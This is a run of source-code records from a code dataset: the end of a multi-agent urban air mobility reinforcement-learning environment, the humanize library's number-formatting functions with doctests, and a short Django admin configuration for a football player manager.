s_hist = self.s_multi_hist[:, i, :], \n a_hist = None, \n hist_len = self.hist_len)\n\n # move plane\n p.upd_dynamics(a=act, discrete_acts=False, perf=self.perf, dest=None)\n else:\n raise NotImplementedError()\n\n # update live times\n if self.prio:\n self.ts_before_respawn = copy(self.ts_alive)\n self.ts_alive += 1\n\n # update distances to destination\n for p in self.planes:\n p.D_dest_old = copy(p.D_dest)\n p.D_dest = latlondist(latd1=p.lat, lond1=p.lon, latd2=self.dest.lat, lond2=self.dest.lon)\n\n # check destination entries\n entered_close, entered_open = self.dest.step(self.planes)\n\n # count accidents, incidents, false entries\n self._count_mistakes(entered_close)\n\n # respawning\n self._handle_respawn(entered_open)\n\n # compute state, reward, done \n self._set_state()\n self._calculate_reward(entered_close, entered_open)\n d = self._done()\n\n if self.multi_policy:\n return self.state, self.r, d, {}\n else:\n return self.state, float(self.r[0]), d, {}\n\n def _handle_respawn(self, respawn_flags):\n \"\"\"Respawns planes when they entered the open destination area or are at the outer simulation radius.\"\"\"\n for i, p in enumerate(self.planes):\n if (p.D_dest >= self.dest.respawn_radius) or respawn_flags[i]:\n \n # spawn a plane\n self.planes[i] = self._spawn_plane(i, random=False)\n \n # reset living time only due to vertiport respawning\n if self.prio:\n if respawn_flags[i]:\n self.ts_alive[i] = 0\n\n def _calculate_reward(self, entered_close:np.ndarray, entered_open:np.ndarray):\n \"\"\"Args:\n entered_close: np.ndarray([number_of_planes,]): who entered a closed destination\n entered_open: np.ndarray([number_of_planes,]): who entered an open destination\"\"\"\n r_coll = np.zeros((self.N_planes, 1), dtype=np.float32)\n r_goal = np.zeros((self.N_planes, 1), dtype=np.float32)\n\n # ------- individual reward: collision & leaving map & goal-entering/-approaching -------\n D_matrix = np.ones((len(self.planes), len(self.planes))) * np.inf\n for i, pi in enumerate(self.planes):\n for j, pj in enumerate(self.planes):\n if i != j:\n D_matrix[i][j] = latlondist(latd1=pi.lat, lond1=pi.lon, latd2=pj.lat, lond2=pj.lon)\n\n for i, pi in enumerate(self.planes):\n\n # collision\n D = float(np.min(D_matrix[i]))\n\n if D <= self.accident_dist:\n r_coll[i] -= 10.0\n\n elif D <= self.incident_dist:\n r_coll[i] -= 5.0\n\n else:\n r_coll[i] -= 1*np.exp(-D/(2*self.incident_dist))\n\n # off-map (+5 agains numerical issues)\n if pi.D_dest > (self.dest.spawn_radius + 5.0): \n r_coll[i] -= 5.0\n\n # closed goal entering\n if entered_close[i]:\n r_goal[i] -= 5.0\n\n # open goal entering\n if entered_open[i]:\n\n # check whether only one vehicle entered\n if sum(entered_open) == 1:\n\n if self.prio:\n # check whether the vehicle had the longest living time\n if self.ts_before_respawn[i] == np.max(self.ts_before_respawn):\n r_goal[i] += 5.0\n\n # otherwise punish\n else:\n r_goal[i] -= 5.0\n else:\n r_goal[i] += 5.0\n\n # bad if someone entered simultaneously\n else:\n r_goal[i] -= 5.0\n\n # open goal approaching for the one who should go next\n if self.prio:\n if self.dest.was_open and (self.ts_before_respawn[i] == np.max(self.ts_before_respawn)):\n r_goal[i] += (pi.D_dest_old - pi.D_dest)/5.0\n\n # ------------- collective reward: goal status ----------------\n # incentive structure\n if self.dest.is_open:\n r_goal -= 0.5 * self.dest.t_open_since/self.dest.t_close\n else:\n r_goal += 0.25\n\n # aggregate reward components\n r = (self.w_coll*r_coll + self.w_goal*r_goal)/self.w\n\n # store\n self.r = r\n self.r_coll = r_coll\n self.r_goal = r_goal\n\n def _done(self):\n # artificial done signal\n if self.step_cnt >= self._max_episode_steps:\n return True\n return False\n\n def _count_mistakes(self, entered_close):\n self.N_enterances_closed_d += sum(entered_close)\n for i, pi in enumerate(self.planes):\n for j, pj in enumerate(self.planes):\n if i < j:\n D = latlondist(latd1=pi.lat, lond1=pi.lon, latd2=pj.lat, lond2=pj.lon)\n if D <= self.accident_dist:\n self.N_accs += 1\n elif D <= self.incident_dist:\n self.N_incs += 1\n def __str__(self):\n return f\"Step: {self.step_cnt}, Sim-Time [s]: {int(self.sim_t)}, # Flight Taxis: {self.N_planes}\" + \"\\n\" +\\\n f\"Time-to-open [s]: {int(self.dest.t_nxt_open)}, Time-since-open[s]: {int(self.dest.t_open_since)}\" + \"\\n\" +\\\n f\"# Episode-Incidents: {self.N_incs}, # Episode-Accidents: {self.N_accs}\" + \"\\n\" +\\\n f\"# Episode-Closed Vertiport Enterances: {self.N_enterances_closed_d}\"\n\n def render(self, mode=None):\n \"\"\"Renders the current environment.\"\"\"\n\n # plot every nth timestep\n if self.step_cnt % 1 == 0: \n \n # init figure\n if len(plt.get_fignums()) == 0:\n if self.plot_reward and self.plot_state:\n self.f = plt.figure(figsize=(14, 8))\n self.gs = self.f.add_gridspec(2, 2)\n self.ax1 = self.f.add_subplot(self.gs[:, 0]) # ship\n self.ax2 = self.f.add_subplot(self.gs[0, 1]) # reward\n self.ax3 = self.f.add_subplot(self.gs[1, 1]) # state\n\n elif self.plot_reward:\n self.f = plt.figure(figsize=(14, 8))\n self.gs = self.f.add_gridspec(1, 2)\n self.ax1 = self.f.add_subplot(self.gs[0, 0]) # ship\n self.ax2 = self.f.add_subplot(self.gs[0, 1]) # reward\n\n elif self.plot_state:\n self.f = plt.figure(figsize=(14, 8))\n self.gs = self.f.add_gridspec(1, 2)\n self.ax1 = self.f.add_subplot(self.gs[0, 0]) # ship\n self.ax3 = self.f.add_subplot(self.gs[0, 1]) # state\n\n else:\n self.f, self.ax1 = plt.subplots(1, 1, figsize=(10, 10))\n plt.ion()\n plt.show() \n\n # storage\n if self.plot_reward:\n if self.step_cnt == 0:\n if self.multi_policy:\n self.ax2.r = np.zeros((self.N_planes, self._max_episode_steps))\n self.ax2.r_coll = np.zeros((self.N_planes, self._max_episode_steps))\n self.ax2.r_goal = np.zeros((self.N_planes, self._max_episode_steps))\n else:\n self.ax2.r = np.zeros(self._max_episode_steps)\n self.ax2.r_coll = np.zeros(self._max_episode_steps)\n self.ax2.r_goal = np.zeros(self._max_episode_steps)\n else:\n if self.multi_policy:\n self.ax2.r[:, self.step_cnt] = self.r.flatten()\n self.ax2.r_coll[:, self.step_cnt] = self.r_coll.flatten()\n self.ax2.r_goal[:, self.step_cnt] = self.r_goal.flatten()\n else:\n self.ax2.r[self.step_cnt] = self.r if isinstance(self.r, float) else float(self.r[0])\n self.ax2.r_coll[self.step_cnt] = self.r_coll if isinstance(self.r_coll, float) else float(self.r_coll[0])\n self.ax2.r_goal[self.step_cnt] = self.r_goal if isinstance(self.r_goal, float) else float(self.r_goal[0])\n\n if self.plot_state:\n if self.step_cnt == 0:\n self.ax3.s = np.zeros((self.obs_size, self._max_episode_steps))\n else:\n if self.multi_policy:\n self.ax3.s[:, self.step_cnt] = self.state[0]\n else:\n self.ax3.s[:, self.step_cnt] = self.state\n\n # periodically clear and init\n if self.step_cnt % 50 == 0:\n\n # clearance\n self.ax1.clear()\n if self.plot_reward:\n self.ax2.clear()\n if self.plot_state:\n self.ax3.clear()\n\n # appearance\n self.ax1.set_title(\"Urban Air Mobility\")\n self.ax1.set_xlabel(\"Lon [°]\")\n self.ax1.set_ylabel(\"Lat [°]\")\n self.ax1.set_xlim(9.985, 10.015)\n self.ax1.set_ylim(9.985, 10.015)\n\n if self.plot_reward:\n self.ax2.set_xlabel(\"Timestep in episode\")\n self.ax2.set_ylabel(\"Reward of ID0\")\n self.ax2.set_xlim(0, 50*(np.ceil(self.step_cnt/50)+1))\n self.ax2.set_ylim(-7, 7)\n\n if self.plot_state:\n self.ax3.set_xlabel(\"Timestep in episode\")\n self.ax3.set_ylabel(\"State of Agent 0\")\n self.ax3.set_xlim(0, 50*(np.ceil(self.step_cnt/50)+1))\n self.ax3.set_ylim(-2, 5)\n\n # ---------------- non-animated artists ----------------\n # spawning area\n lats, lons = map(list, zip(*[qdrpos(latd1=self.dest.lat, lond1=self.dest.lon, qdr=deg, dist=meter_to_NM(self.dest.spawn_radius))\\\n for deg in self.clock_degs]))\n self.ax1.plot(lons, lats, color=\"grey\")\n\n # respawn area\n lats, lons = map(list, zip(*[qdrpos(latd1=self.dest.lat, lond1=self.dest.lon, qdr=deg, dist=meter_to_NM(self.dest.respawn_radius))\\\n for deg in self.clock_degs]))\n self.ax1.plot(lons, lats, color=\"black\")\n\n # ---------- animated artists: initial drawing ---------\n # step info\n self.ax1.info_txt = self.ax1.text(x=9.9865, y=10.012, s=\"\", fontdict={\"size\" : 9}, animated=True)\n\n # destination\n lats, lons = map(list, zip(*[qdrpos(latd1=self.dest.lat, lond1=self.dest.lon, qdr=deg, dist=meter_to_NM(self.dest.radius))\\\n for deg in self.clock_degs]))\n self.ax1.dest_ln = self.ax1.plot(lons, lats, color=self.dest.color, animated=True)[0]\n\n # aircraft information\n self.ax1.scs = []\n self.ax1.lns = []\n self.ax1.txts = []\n\n for i, p in enumerate(self.planes):\n\n # show aircraft\n self.ax1.scs.append(self.ax1.scatter([], [], marker=(3, 0, -p.hdg), color=COLORS[i], animated=True))\n\n # incident area\n self.ax1.lns.append(self.ax1.plot([], [], color=COLORS[i], animated=True)[0])\n\n # information\n self.ax1.txts.append(self.ax1.text(x=0.0, y=0.0, s=\"\", color=COLORS[i], fontdict={\"size\" : 8}, animated=True))\n\n if self.plot_reward:\n self.ax2.lns_agg = []\n self.ax2.lns_coll = []\n self.ax2.lns_goal = []\n\n if self.multi_policy:\n for i in range(self.N_planes):\n self.ax2.lns_agg.append(self.ax2.plot([], [], color=COLORS[i], label=f\"Agg {i}\", animated=True)[0])\n self.ax2.lns_coll.append(self.ax2.plot([], [], color=COLORS[i], label=f\"Collision {i}\", linestyle=\"dotted\", animated=True)[0])\n self.ax2.lns_goal.append(self.ax2.plot([], [], color=COLORS[i], label=f\"Goal {i}\", linestyle=\"dashed\", animated=True)[0])\n else:\n self.ax2.lns_agg.append(self.ax2.plot([], [], color=COLORS[0], label=f\"Agg\", animated=True)[0])\n self.ax2.lns_coll.append(self.ax2.plot([], [], color=COLORS[1], label=f\"Collision\", animated=True)[0])\n self.ax2.lns_goal.append(self.ax2.plot([], [], color=COLORS[2], label=f\"Goal\", animated=True)[0])\n\n self.ax2.legend()\n\n if self.plot_state:\n self.ax3.lns = []\n for i in range(self.obs_size):\n self.ax3.lns.append(self.ax3.plot([], [], label=self.obs_names[i], color=COLORS[i], animated=True)[0])\n self.ax3.legend()\n\n # ----------------- store background -------------------\n self.f.canvas.draw()\n self.ax1.bg = self.f.canvas.copy_from_bbox(self.ax1.bbox)\n if self.plot_reward:\n self.ax2.bg = self.f.canvas.copy_from_bbox(self.ax2.bbox)\n if self.plot_state:\n self.ax3.bg = self.f.canvas.copy_from_bbox(self.ax3.bbox)\n else:\n\n # ------------- restore the background ---------------\n self.f.canvas.restore_region(self.ax1.bg)\n if self.plot_reward:\n self.f.canvas.restore_region(self.ax2.bg)\n if self.plot_state:\n self.f.canvas.restore_region(self.ax3.bg)\n\n # ----------- animated artists: update ---------------\n # step info\n self.ax1.info_txt.set_text(self.__str__())\n self.ax1.draw_artist(self.ax1.info_txt)\n\n # destination\n self.ax1.dest_ln.set_color(self.dest.color)\n self.ax1.draw_artist(self.ax1.dest_ln)\n\n for i, p in enumerate(self.planes):\n\n # show aircraft\n self.ax1.scs[i].set_offsets(np.array([p.lon, p.lat]))\n self.ax1.draw_artist(self.ax1.scs[i])\n\n # incident area\n lats, lons = map(list, zip(*[qdrpos(latd1=p.lat, lond1=p.lon, qdr=deg, dist=meter_to_NM(self.incident_dist/2))\\\n for deg in self.clock_degs]))\n self.ax1.lns[i].set_data(lons, lats) \n self.ax1.draw_artist(self.ax1.lns[i])\n\n # information\n s = f\"id: {i}\" + \"\\n\" + f\"hdg: {p.hdg:.1f}\" + \"\\n\" + f\"alt: {p.alt:.1f}\" + \"\\n\" + \\\n f\"tas: {p.tas:.1f}\"\n\n if hasattr(self, \"ts_alive\"):\n s += \"\\n\" + f\"t alive: {int(self.ts_alive[i])}\"\n if self.ts_alive[i] == np.max(self.ts_alive):\n s += \" (Next!)\"\n\n if hasattr(p, \"role\"):\n s += \"\\n\" + f\"role: {p.role}\"\n self.ax1.txts[i].set_text(s)\n self.ax1.txts[i].set_position((p.lon, p.lat))\n self.ax1.draw_artist(self.ax1.txts[i])\n\n # reward\n if self.plot_reward:\n if self.multi_policy:\n for i in range(self.N_planes):\n self.ax2.lns_agg[i].set_data(np.arange(self.step_cnt+1), self.ax2.r[i][:self.step_cnt+1])\n self.ax2.lns_coll[i].set_data(np.arange(self.step_cnt+1), self.ax2.r_coll[i][:self.step_cnt+1])\n self.ax2.lns_goal[i].set_data(np.arange(self.step_cnt+1), self.ax2.r_goal[i][:self.step_cnt+1])\n\n self.ax2.draw_artist(self.ax2.lns_agg[i])\n self.ax2.draw_artist(self.ax2.lns_coll[i])\n self.ax2.draw_artist(self.ax2.lns_goal[i])\n else:\n self.ax2.lns_agg[0].set_data(np.arange(self.step_cnt+1), self.ax2.r[:self.step_cnt+1])\n self.ax2.lns_coll[0].set_data(np.arange(self.step_cnt+1), self.ax2.r_coll[:self.step_cnt+1])\n self.ax2.lns_goal[0].set_data(np.arange(self.step_cnt+1), self.ax2.r_goal[:self.step_cnt+1])\n \n self.ax2.draw_artist(self.ax2.lns_agg[0])\n self.ax2.draw_artist(self.ax2.lns_coll[0])\n self.ax2.draw_artist(self.ax2.lns_goal[0])\n\n # state\n if self.plot_state:\n for i in range(self.obs_size):\n self.ax3.lns[i].set_data(np.arange(self.step_cnt+1), self.ax3.s[i][:self.step_cnt+1])\n self.ax3.draw_artist(self.ax3.lns[i])\n\n # show it on screen\n self.f.canvas.blit(self.ax1.bbox)\n if self.plot_reward:\n self.f.canvas.blit(self.ax2.bbox)\n if self.plot_state:\n self.f.canvas.blit(self.ax3.bbox)\n \n plt.pause(0.05)\n","repo_name":"MarWaltz/TUD_RL","sub_path":"tud_rl/envs/_envs/UAM.py","file_name":"UAM.py","file_ext":"py","file_size_in_byte":30829,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"3"}
+{"seq_id":"35029791360","text":"\"\"\"Humanizing functions for numbers.\"\"\"\nfrom __future__ import annotations\n\nimport math\nimport re\nimport sys\nfrom fractions import Fraction\nfrom typing import TYPE_CHECKING\n\nfrom .i18n import _gettext as _\nfrom .i18n import _ngettext\nfrom .i18n import _ngettext_noop as NS_\nfrom .i18n import _pgettext as P_\nfrom .i18n import decimal_separator, thousands_separator\n\nif TYPE_CHECKING:\n if sys.version_info >= (3, 10):\n from typing import TypeAlias\n else:\n from typing_extensions import TypeAlias\n\n# This type can be better defined by typing.SupportsInt, typing.SupportsFloat\n# but that's a Python 3.8 only typing option.\nNumberOrString: TypeAlias = \"float | str\"\n\n\ndef _format_not_finite(value: float) -> str:\n \"\"\"Utility function to handle infinite and nan cases.\"\"\"\n if math.isnan(value):\n return \"NaN\"\n if math.isinf(value) and value < 0:\n return \"-Inf\"\n if math.isinf(value) and value > 0:\n return \"+Inf\"\n return \"\"\n\n\ndef ordinal(value: NumberOrString, gender: str = \"male\") -> str:\n \"\"\"Converts an integer to its ordinal as a string.\n\n For example, 1 is \"1st\", 2 is \"2nd\", 3 is \"3rd\", etc. Works for any integer or\n anything `int()` will turn into an integer. Anything else will return the output\n of str(value).\n\n Examples:\n ```pycon\n >>> ordinal(1)\n '1st'\n >>> ordinal(1002)\n '1002nd'\n >>> ordinal(103)\n '103rd'\n >>> ordinal(4)\n '4th'\n >>> ordinal(12)\n '12th'\n >>> ordinal(101)\n '101st'\n >>> ordinal(111)\n '111th'\n >>> ordinal(\"something else\")\n 'something else'\n >>> ordinal([1, 2, 3]) == \"[1, 2, 3]\"\n True\n\n ```\n Args:\n value (int, str, float): Integer to convert.\n gender (str): Gender for translations. Accepts either \"male\" or \"female\".\n\n Returns:\n str: Ordinal string.\n \"\"\"\n try:\n if not math.isfinite(float(value)):\n return _format_not_finite(float(value))\n value = int(value)\n except (TypeError, ValueError):\n return str(value)\n if gender == \"male\":\n t = (\n P_(\"0 (male)\", \"th\"),\n P_(\"1 (male)\", \"st\"),\n P_(\"2 (male)\", \"nd\"),\n P_(\"3 (male)\", \"rd\"),\n P_(\"4 (male)\", \"th\"),\n P_(\"5 (male)\", \"th\"),\n P_(\"6 (male)\", \"th\"),\n P_(\"7 (male)\", \"th\"),\n P_(\"8 (male)\", \"th\"),\n P_(\"9 (male)\", \"th\"),\n )\n else:\n t = (\n P_(\"0 (female)\", \"th\"),\n P_(\"1 (female)\", \"st\"),\n P_(\"2 (female)\", \"nd\"),\n P_(\"3 (female)\", \"rd\"),\n P_(\"4 (female)\", \"th\"),\n P_(\"5 (female)\", \"th\"),\n P_(\"6 (female)\", \"th\"),\n P_(\"7 (female)\", \"th\"),\n P_(\"8 (female)\", \"th\"),\n P_(\"9 (female)\", \"th\"),\n )\n if value % 100 in (11, 12, 13): # special case\n return f\"{value}{t[0]}\"\n return f\"{value}{t[value % 10]}\"\n\n\ndef intcomma(value: NumberOrString, ndigits: int | None = None) -> str:\n \"\"\"Converts an integer to a string containing commas every three digits.\n\n For example, 3000 becomes \"3,000\" and 45000 becomes \"45,000\". To maintain some\n compatibility with Django's `intcomma`, this function also accepts floats.\n\n Examples:\n ```pycon\n >>> intcomma(100)\n '100'\n >>> intcomma(\"1000\")\n '1,000'\n >>> intcomma(1_000_000)\n '1,000,000'\n >>> intcomma(1_234_567.25)\n '1,234,567.25'\n >>> intcomma(1234.5454545, 2)\n '1,234.55'\n >>> intcomma(14308.40, 1)\n '14,308.4'\n >>> intcomma(\"14308.40\", 1)\n '14,308.4'\n >>> intcomma(None)\n 'None'\n\n ```\n Args:\n value (int, float, str): Integer or float to convert.\n ndigits (int, None): Digits of precision for rounding after the decimal point.\n\n Returns:\n str: String containing commas every three digits.\n \"\"\"\n thousands_sep = thousands_separator()\n decimal_sep = decimal_separator()\n try:\n if isinstance(value, str):\n value = value.replace(thousands_sep, \"\").replace(decimal_sep, \".\")\n if not math.isfinite(float(value)):\n return _format_not_finite(float(value))\n if \".\" in value:\n value = float(value)\n else:\n value = int(value)\n else:\n if not math.isfinite(float(value)):\n return _format_not_finite(float(value))\n float(value)\n except (TypeError, ValueError):\n return str(value)\n\n if ndigits is not None:\n orig = \"{0:.{1}f}\".format(value, ndigits)\n else:\n orig = str(value)\n orig = orig.replace(\".\", decimal_sep)\n while True:\n new = re.sub(r\"^(-?\\d+)(\\d{3})\", rf\"\\g<1>{thousands_sep}\\g<2>\", orig)\n if orig == new:\n return new\n orig = new\n\n\npowers = [10**x for x in (3, 6, 9, 12, 15, 18, 21, 24, 27, 30, 33, 100)]\nhuman_powers = (\n NS_(\"thousand\", \"thousand\"),\n NS_(\"million\", \"million\"),\n NS_(\"billion\", \"billion\"),\n NS_(\"trillion\", \"trillion\"),\n NS_(\"quadrillion\", \"quadrillion\"),\n NS_(\"quintillion\", \"quintillion\"),\n NS_(\"sextillion\", \"sextillion\"),\n NS_(\"septillion\", \"septillion\"),\n NS_(\"octillion\", \"octillion\"),\n NS_(\"nonillion\", \"nonillion\"),\n NS_(\"decillion\", \"decillion\"),\n NS_(\"googol\", \"googol\"),\n)\n\n\ndef intword(value: NumberOrString, format: str = \"%.1f\") -> str:\n \"\"\"Converts a large integer to a friendly text representation.\n\n Works best for numbers over 1 million. For example, 1_000_000 becomes \"1.0 million\",\n 1200000 becomes \"1.2 million\" and \"1_200_000_000\" becomes \"1.2 billion\". Supports up\n to decillion (33 digits) and googol (100 digits).\n\n Examples:\n ```pycon\n >>> intword(\"100\")\n '100'\n >>> intword(\"12400\")\n '12.4 thousand'\n >>> intword(\"1000000\")\n '1.0 million'\n >>> intword(1_200_000_000)\n '1.2 billion'\n >>> intword(8100000000000000000000000000000000)\n '8.1 decillion'\n >>> intword(None)\n 'None'\n >>> intword(\"1234000\", \"%0.3f\")\n '1.234 million'\n\n ```\n Args:\n value (int, float, str): Integer to convert.\n format (str): To change the number of decimal or general format of the number\n portion.\n\n Returns:\n str: Friendly text representation as a string, unless the value passed could not\n be coaxed into an `int`.\n \"\"\"\n try:\n if not math.isfinite(float(value)):\n return _format_not_finite(float(value))\n value = int(value)\n except (TypeError, ValueError):\n return str(value)\n\n if value < 0:\n value *= -1\n negative_prefix = \"-\"\n else:\n negative_prefix = \"\"\n\n if value < powers[0]:\n return negative_prefix + str(value)\n\n for ordinal_, power in enumerate(powers[1:], 1):\n if value < power:\n chopped = value / float(powers[ordinal_ - 1])\n powers_difference = powers[ordinal_] / powers[ordinal_ - 1]\n if float(format % chopped) == powers_difference:\n chopped = value / float(powers[ordinal_])\n singular, plural = human_powers[ordinal_]\n return (\n negative_prefix\n + \" \".join(\n [format, _ngettext(singular, plural, math.ceil(chopped))]\n )\n ) % chopped\n\n singular, plural = human_powers[ordinal_ - 1]\n return (\n negative_prefix\n + \" \".join([format, _ngettext(singular, plural, math.ceil(chopped))])\n ) % chopped\n\n return negative_prefix + str(value)\n\n\ndef apnumber(value: NumberOrString) -> str:\n \"\"\"Converts an integer to Associated Press style.\n\n Examples:\n ```pycon\n >>> apnumber(0)\n 'zero'\n >>> apnumber(5)\n 'five'\n >>> apnumber(10)\n '10'\n >>> apnumber(\"7\")\n 'seven'\n >>> apnumber(\"foo\")\n 'foo'\n >>> apnumber(None)\n 'None'\n\n ```\n Args:\n value (int, float, str): Integer to convert.\n\n Returns:\n str: For numbers 0-9, the number spelled out. Otherwise, the number. This always\n returns a string unless the value was not `int`-able, then `str(value)`\n is returned.\n \"\"\"\n try:\n if not math.isfinite(float(value)):\n return _format_not_finite(float(value))\n value = int(value)\n except (TypeError, ValueError):\n return str(value)\n if not 0 <= value < 10:\n return str(value)\n return (\n _(\"zero\"),\n _(\"one\"),\n _(\"two\"),\n _(\"three\"),\n _(\"four\"),\n _(\"five\"),\n _(\"six\"),\n _(\"seven\"),\n _(\"eight\"),\n _(\"nine\"),\n )[value]\n\n\ndef fractional(value: NumberOrString) -> str:\n \"\"\"Convert to fractional number.\n\n There will be some cases where one might not want to show ugly decimal places for\n floats and decimals.\n\n This function returns a human-readable fractional number in form of fractions and\n mixed fractions.\n\n Pass in a string, or a number or a float, and this function returns:\n\n * a string representation of a fraction\n * or a whole number\n * or a mixed fraction\n * or the str output of the value, if it could not be converted\n\n Examples:\n ```pycon\n >>> fractional(0.3)\n '3/10'\n >>> fractional(1.3)\n '1 3/10'\n >>> fractional(float(1/3))\n '1/3'\n >>> fractional(1)\n '1'\n >>> fractional(\"ten\")\n 'ten'\n >>> fractional(None)\n 'None'\n\n ```\n Args:\n value (int, float, str): Integer to convert.\n\n Returns:\n str: Fractional number as a string.\n \"\"\"\n try:\n number = float(value)\n if not math.isfinite(number):\n return _format_not_finite(number)\n except (TypeError, ValueError):\n return str(value)\n whole_number = int(number)\n frac = Fraction(number - whole_number).limit_denominator(1000)\n numerator = frac.numerator\n denominator = frac.denominator\n if whole_number and not numerator and denominator == 1:\n # this means that an integer was passed in\n # (or variants of that integer like 1.0000)\n return f\"{whole_number:.0f}\"\n\n if not whole_number:\n return f\"{numerator:.0f}/{denominator:.0f}\"\n\n return f\"{whole_number:.0f} {numerator:.0f}/{denominator:.0f}\"\n\n\ndef scientific(value: NumberOrString, precision: int = 2) -> str:\n \"\"\"Return number in string scientific notation z.wq x 10ⁿ.\n\n Examples:\n ```pycon\n >>> scientific(float(0.3))\n '3.00 x 10⁻¹'\n >>> scientific(int(500))\n '5.00 x 10²'\n >>> scientific(-1000)\n '-1.00 x 10³'\n >>> scientific(1000, 1)\n '1.0 x 10³'\n >>> scientific(1000, 3)\n '1.000 x 10³'\n >>> scientific(\"99\")\n '9.90 x 10¹'\n >>> scientific(\"foo\")\n 'foo'\n >>> scientific(None)\n 'None'\n\n ```\n\n Args:\n value (int, float, str): Input number.\n precision (int): Number of decimal for first part of the number.\n\n Returns:\n str: Number in scientific notation z.wq x 10ⁿ.\n \"\"\"\n exponents = {\n \"0\": \"⁰\",\n \"1\": \"¹\",\n \"2\": \"²\",\n \"3\": \"³\",\n \"4\": \"⁴\",\n \"5\": \"⁵\",\n \"6\": \"⁶\",\n \"7\": \"⁷\",\n \"8\": \"⁸\",\n \"9\": \"⁹\",\n \"-\": \"⁻\",\n }\n try:\n value = float(value)\n if not math.isfinite(value):\n return _format_not_finite(value)\n except (ValueError, TypeError):\n return str(value)\n fmt = \"{:.%se}\" % str(int(precision))\n n = fmt.format(value)\n part1, part2 = n.split(\"e\")\n # Remove redundant leading '+' or '0's (preserving the last '0' for 10⁰).\n part2 = re.sub(r\"^\\+?(\\-?)0*(.+)$\", r\"\\1\\2\", part2)\n\n new_part2 = []\n for char in part2:\n new_part2.append(exponents[char])\n\n final_str = part1 + \" x 10\" + \"\".join(new_part2)\n\n return final_str\n\n\ndef clamp(\n value: float,\n format: str = \"{:}\",\n floor: float | None = None,\n ceil: float | None = None,\n floor_token: str = \"<\",\n ceil_token: str = \">\",\n) -> str:\n \"\"\"Returns number with the specified format, clamped between floor and ceil.\n\n If the number is larger than ceil or smaller than floor, then the respective limit\n will be returned, formatted and prepended with a token specifying as such.\n\n Examples:\n ```pycon\n >>> clamp(123.456)\n '123.456'\n >>> clamp(0.0001, floor=0.01)\n '<0.01'\n >>> clamp(0.99, format=\"{:.0%}\", ceil=0.99)\n '99%'\n >>> clamp(0.999, format=\"{:.0%}\", ceil=0.99)\n '>99%'\n >>> clamp(1, format=intword, floor=1e6, floor_token=\"under \")\n 'under 1.0 million'\n >>> clamp(None) is None\n True\n\n ```\n\n Args:\n value (int, float): Input number.\n format (str OR callable): Can either be a formatting string, or a callable\n function that receives value and returns a string.\n floor (int, float): Smallest value before clamping.\n ceil (int, float): Largest value before clamping.\n floor_token (str): If value is smaller than floor, token will be prepended\n to output.\n ceil_token (str): If value is larger than ceil, token will be prepended\n to output.\n\n Returns:\n str: Formatted number. The output is clamped between the indicated floor and\n ceil. If the number is larger than ceil or smaller than floor, the output\n will be prepended with a token indicating as such.\n\n \"\"\"\n if value is None:\n return None\n\n if not math.isfinite(value):\n return _format_not_finite(value)\n\n if floor is not None and value < floor:\n value = floor\n token = floor_token\n elif ceil is not None and value > ceil:\n value = ceil\n token = ceil_token\n else:\n token = \"\"\n\n if isinstance(format, str):\n return token + format.format(value)\n\n if callable(format):\n return token + format(value)\n\n msg = (\n \"Invalid format. Must be either a valid formatting string, or a function \"\n \"that accepts value and returns a string.\"\n )\n raise ValueError(msg)\n\n\ndef metric(value: float, unit: str = \"\", precision: int = 3) -> str:\n \"\"\"Return a value with a metric SI unit-prefix appended.\n\n Examples:\n ```pycon\n >>> metric(1500, \"V\")\n '1.50 kV'\n >>> metric(2e8, \"W\")\n '200 MW'\n >>> metric(220e-6, \"F\")\n '220 μF'\n >>> metric(1e-14, precision=4)\n '10.00 f'\n\n ```\n\n The unit prefix is always chosen so that non-significant zero digits are required.\n i.e. `123,000` will become `123k` instead of `0.123M` and `1,230,000` will become\n `1.23M` instead of `1230K`. For numbers that are either too huge or too tiny to\n represent without resorting to either leading or trailing zeroes, it falls back to\n `scientific()`.\n ```pycon\n >>> metric(1e40)\n '1.00 x 10⁴⁰'\n\n ```\n\n Args:\n value (int, float): Input number.\n unit (str): Optional base unit.\n precision (int): The number of digits the output should contain.\n\n Returns:\n str:\n \"\"\"\n if not math.isfinite(value):\n return _format_not_finite(value)\n exponent = int(math.floor(math.log10(abs(value)))) if value != 0 else 0\n\n if exponent >= 33 or exponent < -30:\n return scientific(value, precision - 1) + unit\n\n value /= 10 ** (exponent // 3 * 3)\n if exponent >= 3:\n ordinal_ = \"kMGTPEZYRQ\"[exponent // 3 - 1]\n elif exponent < 0:\n ordinal_ = \"mμnpfazyrq\"[(-exponent - 1) // 3]\n else:\n ordinal_ = \"\"\n value_ = format(value, \".%if\" % (precision - (exponent % 3) - 1))\n if not (unit or ordinal_) or unit in (\"°\", \"′\", \"″\"):\n space = \"\"\n else:\n space = \" \"\n\n return f\"{value_}{space}{ordinal_}{unit}\"\n","repo_name":"python-humanize/humanize","sub_path":"src/humanize/number.py","file_name":"number.py","file_ext":"py","file_size_in_byte":16246,"program_lang":"python","lang":"en","doc_type":"code","stars":301,"dataset":"github-code","pt":"3"}
+{"seq_id":"12796179926","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom .models import County, Academy, Player, Admin\nfrom .forms import AddUser\n\n\nclass CustomUserAdmin(UserAdmin):\n fieldsets = (\n (None, {\"fields\": (\"name\", \"password\", \"role\")}),\n (\n \"Permissions\",\n {\n \"fields\": (\n \"is_active\",\n \"is_staff\",\n \"is_superuser\",\n \"groups\",\n \"user_permissions\",\n )\n },\n ),\n )\n add_fieldsets = (\n (\n None,\n {\n \"classes\": (\"wide\",),\n \"fields\": (\"name\", \"password1\", \"password2\", \"role\"),\n },\n ),\n )\n\n list_display = (\"name\", \"role\", \"is_staff\")\n list_filter = (\"is_staff\", \"is_superuser\", \"is_active\", \"groups\")\n\n search_fields = (\"name\",)\n ordering = (\"name\",)\n filter_horizontal = (\n \"groups\",\n \"user_permissions\",\n )\n\n\nadmin.site.register(County)\nadmin.site.register(Academy)\nadmin.site.register(Player)\nadmin.site.register(Admin, CustomUserAdmin)\n","repo_name":"hawkinswinja/player-manager","sub_path":"fkf/manager/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
